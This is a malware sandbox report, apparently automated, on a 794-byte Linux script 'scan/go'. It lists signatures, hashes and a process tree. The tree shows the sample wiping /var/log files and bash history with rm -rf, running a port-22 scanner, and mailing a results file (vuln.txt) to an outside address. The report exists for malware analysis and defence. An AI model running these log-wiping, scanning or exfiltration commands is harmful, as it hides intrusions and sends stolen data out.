Overview

overview

7

Static

static

1

scan/1

ubuntu-18.04-amd64

1

scan/1

debian-9-armhf

1

scan/1

debian-9-mips

1

scan/1

debian-9-mipsel

1

scan/2

ubuntu-18.04-amd64

1

scan/2

debian-9-armhf

1

scan/2

debian-9-mips

1

scan/2

debian-9-mipsel

1

scan/3

ubuntu-18.04-amd64

1

scan/3

debian-9-armhf

1

scan/3

debian-9-mips

1

scan/3

debian-9-mipsel

1

scan/class

ubuntu-18.04-amd64

1

scan/go

ubuntu-18.04-amd64

7

scan/go

debian-9-armhf

1

scan/go

debian-9-mips

7

scan/go

debian-9-mipsel

7

scan/random

ubuntu-18.04-amd64

1

scan/random

debian-9-armhf

1

scan/random

debian-9-mips

1

scan/random

debian-9-mipsel

1

scan/screen

ubuntu-18.04-amd64

scan/update

ubuntu-18.04-amd64

1

Analysis

  • max time kernel
    21s
  • max time network
    14s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20231222-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20231222-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    22/12/2023, 08:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    scan/go

  • Size

    794B

  • MD5

    fd52040029cde6318569f91abc1090fc

  • SHA1

    65117e69cfc77df7db1d0695eb66903093e2e397

  • SHA256

    150ad9bc0078b993db48ed0d373723df82c89e23c3d1dcfb795aac3f5853a5cc

  • SHA512

    5f707d39c2494cf7bc41acc3a5402d1442ab12c4cc2c73c9f15dedac7e9d37d25a01119a02887e442bdeaacc3f3290b6dd33f1c5cdbbca011df140c11ce129f7

Score
7/10
evasion

Malware Config

Signatures

  • Deletes Audit logs 1 TTPs 1 IoCs

    Deletes logs related to the Linux Audit framework.

    evasion
  • Deletes system logs 1 TTPs 4 IoCs

    Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

    evasion
  • Deletes log files 1 TTPs 48 IoCs

    Deletes log files on the system.

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/scan/go
    /tmp/scan/go
    1⤵
    • Writes file to tmp directory
    PID:742
    • /bin/ls
      ls /var/log/
      2⤵
      • Reads runtime system information
      PID:748
    • /bin/rm
      rm -rf /var/log/alternatives.log
      2⤵
      • Deletes log files
      PID:749
    • /usr/bin/touch
      touch /var/log/alternatives.log
      2⤵
        PID:750
      • /bin/rm
        rm -rf /var/log/apt
        2⤵
        • Deletes log files
        PID:752
      • /usr/bin/touch
        touch /var/log/apt
        2⤵
          PID:754
        • /bin/rm
          rm -rf /var/log/audit
          2⤵
          • Deletes Audit logs
          • Deletes log files
          PID:755
        • /usr/bin/touch
          touch /var/log/audit
          2⤵
            PID:756
          • /bin/rm
            rm -rf /var/log/auth.log
            2⤵
            • Deletes log files
            PID:757
          • /usr/bin/touch
            touch /var/log/auth.log
            2⤵
              PID:759
            • /bin/rm
              rm -rf /var/log/btmp
              2⤵
              • Deletes log files
              PID:761
            • /usr/bin/touch
              touch /var/log/btmp
              2⤵
                PID:763
              • /bin/rm
                rm -rf /var/log/daemon.log
                2⤵
                • Deletes log files
                PID:764
              • /usr/bin/touch
                touch /var/log/daemon.log
                2⤵
                  PID:765
                • /bin/rm
                  rm -rf /var/log/debug
                  2⤵
                  • Deletes log files
                  PID:766
                • /usr/bin/touch
                  touch /var/log/debug
                  2⤵
                    PID:767
                  • /bin/rm
                    rm -rf /var/log/dpkg.log
                    2⤵
                    • Deletes log files
                    PID:769
                  • /usr/bin/touch
                    touch /var/log/dpkg.log
                    2⤵
                      PID:770
                    • /bin/rm
                      rm -rf /var/log/exim4
                      2⤵
                      • Deletes log files
                      PID:771
                    • /usr/bin/touch
                      touch /var/log/exim4
                      2⤵
                        PID:772
                      • /bin/rm
                        rm -rf /var/log/faillog
                        2⤵
                        • Deletes log files
                        PID:773
                      • /usr/bin/touch
                        touch /var/log/faillog
                        2⤵
                          PID:774
                        • /bin/rm
                          rm -rf /var/log/fontconfig.log
                          2⤵
                          • Deletes log files
                          PID:775
                        • /usr/bin/touch
                          touch /var/log/fontconfig.log
                          2⤵
                            PID:777
                          • /bin/rm
                            rm -rf /var/log/installer
                            2⤵
                            • Deletes log files
                            PID:778
                          • /usr/bin/touch
                            touch /var/log/installer
                            2⤵
                              PID:779
                            • /bin/rm
                              rm -rf /var/log/kern.log
                              2⤵
                              • Deletes log files
                              PID:780
                            • /usr/bin/touch
                              touch /var/log/kern.log
                              2⤵
                                PID:781
                              • /bin/rm
                                rm -rf /var/log/lastlog
                                2⤵
                                • Deletes log files
                                PID:782
                              • /usr/bin/touch
                                touch /var/log/lastlog
                                2⤵
                                  PID:783
                                • /bin/rm
                                  rm -rf /var/log/messages
                                  2⤵
                                  • Deletes system logs
                                  PID:784
                                • /usr/bin/touch
                                  touch /var/log/messages
                                  2⤵
                                    PID:785
                                  • /bin/rm
                                    rm -rf /var/log/syslog
                                    2⤵
                                    • Deletes system logs
                                    PID:786
                                  • /usr/bin/touch
                                    touch /var/log/syslog
                                    2⤵
                                      PID:787
                                    • /bin/rm
                                      rm -rf /var/log/user.log
                                      2⤵
                                      • Deletes log files
                                      PID:788
                                    • /usr/bin/touch
                                      touch /var/log/user.log
                                      2⤵
                                        PID:789
                                      • /bin/rm
                                        rm -rf /var/log/wtmp
                                        2⤵
                                        • Deletes log files
                                        PID:790
                                      • /usr/bin/touch
                                        touch /var/log/wtmp
                                        2⤵
                                          PID:791
                                        • /bin/sleep
                                          sleep 2
                                          2⤵
                                            PID:792
                                          • /bin/cat
                                            cat motd
                                            2⤵
                                              PID:793
                                            • /tmp/scan/class
                                              ./class 22 -a -i eth0 -s 10
                                              2⤵
                                                PID:794
                                              • /bin/cat
                                                cat bios.txt
                                                2⤵
                                                  PID:795
                                                • /usr/bin/sort
                                                  sort
                                                  2⤵
                                                    PID:796
                                                  • /usr/bin/uniq
                                                    uniq
                                                    2⤵
                                                      PID:797
                                                    • /bin/grep
                                                      grep -c . mfu.txt
                                                      2⤵
                                                        PID:798
                                                      • /tmp/scan/update
                                                        ./update 1500
                                                        2⤵
                                                          PID:799
                                                        • /bin/cat
                                                          cat vuln.txt
                                                          2⤵
                                                            PID:800
                                                          • /usr/bin/mail
                                                            mail -s gugolete "[email protected]"
                                                            2⤵
                                                            • Writes file to tmp directory
                                                            PID:801
                                                            • /usr/sbin/sendmail
                                                              /usr/sbin/sendmail -oi -f "root@debian9-mipsel-20231222-en-8" -t
                                                              3⤵
                                                              • Reads runtime system information
                                                              PID:847
                                                          • /bin/rm
                                                            rm -rf /root/.bash_history
                                                            2⤵
                                                              PID:851
                                                            • /usr/bin/touch
                                                              touch /root/.bash_history
                                                              2⤵
                                                                PID:853
                                                              • /bin/ls
                                                                ls /var/log/
                                                                2⤵
                                                                • Reads runtime system information
                                                                PID:854
                                                              • /bin/rm
                                                                rm -rf /var/log/alternatives.log
                                                                2⤵
                                                                • Deletes log files
                                                                PID:855
                                                              • /usr/bin/touch
                                                                touch /var/log/alternatives.log
                                                                2⤵
                                                                  PID:856
                                                                • /bin/rm
                                                                  rm -rf /var/log/apt
                                                                  2⤵
                                                                  • Deletes log files
                                                                  PID:858
                                                                • /usr/bin/touch
                                                                  touch /var/log/apt
                                                                  2⤵
                                                                    PID:860
                                                                  • /bin/rm
                                                                    rm -rf /var/log/audit
                                                                    2⤵
                                                                    • Deletes log files
                                                                    PID:861
                                                                  • /usr/bin/touch
                                                                    touch /var/log/audit
                                                                    2⤵
                                                                      PID:862
                                                                    • /bin/rm
                                                                      rm -rf /var/log/auth.log
                                                                      2⤵
                                                                      • Deletes log files
                                                                      PID:863
                                                                    • /usr/bin/touch
                                                                      touch /var/log/auth.log
                                                                      2⤵
                                                                        PID:865
                                                                      • /bin/rm
                                                                        rm -rf /var/log/btmp
                                                                        2⤵
                                                                        • Deletes log files
                                                                        PID:866
                                                                      • /usr/bin/touch
                                                                        touch /var/log/btmp
                                                                        2⤵
                                                                          PID:868
                                                                        • /bin/rm
                                                                          rm -rf /var/log/daemon.log
                                                                          2⤵
                                                                          • Deletes log files
                                                                          PID:869
                                                                        • /usr/bin/touch
                                                                          touch /var/log/daemon.log
                                                                          2⤵
                                                                            PID:870
                                                                          • /bin/rm
                                                                            rm -rf /var/log/debug
                                                                            2⤵
                                                                            • Deletes log files
                                                                            PID:871
                                                                          • /usr/bin/touch
                                                                            touch /var/log/debug
                                                                            2⤵
                                                                              PID:873
                                                                            • /bin/rm
                                                                              rm -rf /var/log/dpkg.log
                                                                              2⤵
                                                                              • Deletes log files
                                                                              PID:874
                                                                            • /usr/bin/touch
                                                                              touch /var/log/dpkg.log
                                                                              2⤵
                                                                                PID:876
                                                                              • /bin/rm
                                                                                rm -rf /var/log/exim4
                                                                                2⤵
                                                                                • Deletes log files
                                                                                PID:877
                                                                              • /usr/bin/touch
                                                                                touch /var/log/exim4
                                                                                2⤵
                                                                                  PID:878
                                                                                • /bin/rm
                                                                                  rm -rf /var/log/faillog
                                                                                  2⤵
                                                                                  • Deletes log files
                                                                                  PID:879
                                                                                • /usr/bin/touch
                                                                                  touch /var/log/faillog
                                                                                  2⤵
                                                                                    PID:881
                                                                                  • /bin/rm
                                                                                    rm -rf /var/log/fontconfig.log
                                                                                    2⤵
                                                                                    • Deletes log files
                                                                                    PID:882
                                                                                  • /usr/bin/touch
                                                                                    touch /var/log/fontconfig.log
                                                                                    2⤵
                                                                                      PID:884
                                                                                    • /bin/rm
                                                                                      rm -rf /var/log/installer
                                                                                      2⤵
                                                                                      • Deletes log files
                                                                                      PID:885
                                                                                    • /usr/bin/touch
                                                                                      touch /var/log/installer
                                                                                      2⤵
                                                                                        PID:886
                                                                                      • /bin/rm
                                                                                        rm -rf /var/log/kern.log
                                                                                        2⤵
                                                                                        • Deletes log files
                                                                                        PID:887
                                                                                      • /usr/bin/touch
                                                                                        touch /var/log/kern.log
                                                                                        2⤵
                                                                                          PID:889
                                                                                        • /bin/rm
                                                                                          rm -rf /var/log/lastlog
                                                                                          2⤵
                                                                                          • Deletes log files
                                                                                          PID:891
                                                                                        • /usr/bin/touch
                                                                                          touch /var/log/lastlog
                                                                                          2⤵
                                                                                            PID:892
                                                                                          • /bin/rm
                                                                                            rm -rf /var/log/mail.err
                                                                                            2⤵
                                                                                            • Deletes log files
                                                                                            PID:893
                                                                                          • /usr/bin/touch
                                                                                            touch /var/log/mail.err
                                                                                            2⤵
                                                                                              PID:894
                                                                                            • /bin/rm
                                                                                              rm -rf /var/log/mail.info
                                                                                              2⤵
                                                                                              • Deletes log files
                                                                                              PID:896
                                                                                            • /usr/bin/touch
                                                                                              touch /var/log/mail.info
                                                                                              2⤵
                                                                                                PID:897
                                                                                              • /bin/rm
                                                                                                rm -rf /var/log/mail.log
                                                                                                2⤵
                                                                                                • Deletes log files
                                                                                                PID:899
                                                                                              • /usr/bin/touch
                                                                                                touch /var/log/mail.log
                                                                                                2⤵
                                                                                                  PID:900
                                                                                                • /bin/rm
                                                                                                  rm -rf /var/log/mail.warn
                                                                                                  2⤵
                                                                                                  • Deletes log files
                                                                                                  PID:901
                                                                                                • /usr/bin/touch
                                                                                                  touch /var/log/mail.warn
                                                                                                  2⤵
                                                                                                    PID:902
                                                                                                  • /bin/rm
                                                                                                    rm -rf /var/log/messages
                                                                                                    2⤵
                                                                                                    • Deletes system logs
                                                                                                    PID:904
                                                                                                  • /usr/bin/touch
                                                                                                    touch /var/log/messages
                                                                                                    2⤵
                                                                                                      PID:905
                                                                                                    • /bin/rm
                                                                                                      rm -rf /var/log/syslog
                                                                                                      2⤵
                                                                                                      • Deletes system logs
                                                                                                      PID:907
                                                                                                    • /usr/bin/touch
                                                                                                      touch /var/log/syslog
                                                                                                      2⤵
                                                                                                        PID:908
                                                                                                      • /bin/rm
                                                                                                        rm -rf /var/log/user.log
                                                                                                        2⤵
                                                                                                        • Deletes log files
                                                                                                        PID:909
                                                                                                      • /usr/bin/touch
                                                                                                        touch /var/log/user.log
                                                                                                        2⤵
                                                                                                          PID:910
                                                                                                        • /bin/rm
                                                                                                          rm -rf /var/log/wtmp
                                                                                                          2⤵
                                                                                                          • Deletes log files
                                                                                                          PID:912
                                                                                                        • /usr/bin/touch
                                                                                                          touch /var/log/wtmp
                                                                                                          2⤵
                                                                                                            PID:914
                                                                                                          • /bin/sleep
                                                                                                            sleep 5
                                                                                                            2⤵
                                                                                                              PID:915
                                                                                                            • /tmp/scan/clean
                                                                                                              ./clean
                                                                                                              2⤵
                                                                                                                PID:926

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • /root/dead.letter
                                                                                                              Filesize

                                                                                                              153B

                                                                                                              MD5

                                                                                                              e3b2e9bd6cc9c4e6343e86ce222f7cad

                                                                                                              SHA1

                                                                                                              e75e018425ddc628ad41afda5d242fe9b46bee54

                                                                                                              SHA256

                                                                                                              66f0bf09fe7173051205d407cc04dec3ab31e816835fbd88ec1c8cf363a16e99

                                                                                                              SHA512

                                                                                                              10b6c23b38b03d5aee72f03d2a36b642a4f3656bdb244ee50802e64b6ba0ecab7fa93d5cb007f8adda6ded5ec45364b419abb56272b845c0a5ab171657f43750

                                                                                                              Download Submit

                                                                                                            • /var/spool/exim4/input/1rH0PB-0000Df-PK-D
                                                                                                              Filesize

                                                                                                              19B

                                                                                                              MD5

                                                                                                              28ab3bfaf5d496cb5af2a6e53d673d9b

                                                                                                              SHA1

                                                                                                              990109670713b08e2594803dd46fdf184e2b7e48

                                                                                                              SHA256

                                                                                                              fb7224a6ca5873d9f36c5c94d81ed10112ac7a6164612d8b845252e3825898fb

                                                                                                              SHA512

                                                                                                              4e5edf51d9975946a903eb628a921b7d40496a0a42d2691f002384cf3c31585e4bc19de9c24170bac458239aad0635de11390113cb1793d55f549ce708058268

                                                                                                              Download Submit

                                                                                                            • /var/spool/exim4/input/hdr.847
                                                                                                              Filesize

                                                                                                              740B

                                                                                                              MD5

                                                                                                              371222ae34751ec328c5821895802de3

                                                                                                              SHA1

                                                                                                              9d10693ad8fd99f434b888ccd535e1a2c7b0598a

                                                                                                              SHA256

                                                                                                              7b3772e21c21d328605a48107b19752876d287d6fd8f42e7c8ccfce770629230

                                                                                                              SHA512

                                                                                                              e18dac2f83858979f965034978dd116e012f220c7e530f1fc432c9f12b1f5b46062fae447c8f10d0c396a87ee3cb658584600603cb049b6661ebe3a5914b49e8

                                                                                                              Download Submit

                                                                                                            • /var/spool/exim4/msglog/1rH0PB-0000Df-PK
                                                                                                              Filesize

                                                                                                              89B

                                                                                                              MD5

                                                                                                              b7e6c5be61bd5e1add04ffb6e244e4ed

                                                                                                              SHA1

                                                                                                              5ed61fd0a95f164bbb783061ea7e492beb836269

                                                                                                              SHA256

                                                                                                              cdcca8e3927a7bd7cfaa361c993d8243dd70ec2eac1c09cddaeb51f9c9e68c7e

                                                                                                              SHA512

                                                                                                              88c08991ff2346700b48b0d3b387fd2e8c546d5f260a1a1ba439e02ed2887c0e2c4d4e060ab1b286138b6e5fccc46f60044993f4514cb6740deaeff2e7d109cb

                                                                                                              Download Submit